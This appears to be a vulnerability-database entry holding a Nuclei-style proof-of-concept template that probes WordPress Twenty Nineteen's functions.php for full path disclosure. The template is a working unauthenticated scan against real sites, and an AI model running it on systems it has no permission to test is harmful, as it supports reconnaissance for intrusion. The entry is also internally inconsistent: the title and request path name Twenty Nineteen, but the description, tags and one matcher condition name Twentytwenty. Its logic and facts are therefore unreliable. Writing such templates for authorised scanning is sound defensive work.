wordpress-twentynineteen-fpd: WordPress Twenty Nineteen - Full Path Disclosure

2026-01-08 WordPress Twenty Nineteen PoC Public

Description

The WordPress Twentytwenty themes was detected to be vulnerable to Full Path Disclosure, allowing unauthenticated access to the full application path.

PoC

id: wordpress-twentynineteen-fpd

info:
  name: WordPress Twenty Nineteen - Full Path Disclosure
  author: pussycat0x
  severity: low
  description: |
    The WordPress Twentytwenty themes was detected to be vulnerable to Full Path Disclosure, allowing unauthenticated access to the full application path.
  reference:
    - https://wordpress.org/themes/twentynineteen/
  metadata:
    verified: false
  tags: wordpress,wp,wp-theme,twentytwenty,fpd,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/themes/twentynineteen/functions.php"

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body, "Fatal error", "Uncaught Error:") || contains_all(body, "Warning:", "failed to open stream")'
          - 'contains(body, "twentytwenty")'
          - 'status_code == 200 || status_code == 500'
        condition: and
# digest: 4b0a00483046022100cd0decd2528c481e11875d0358012eee4baa2e191b1ec2143621adf97c129318022100c9f15b8cb7b656a1544bbb43b1ac924ccae0c3a6bc82cb54b817da7668d0237d:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities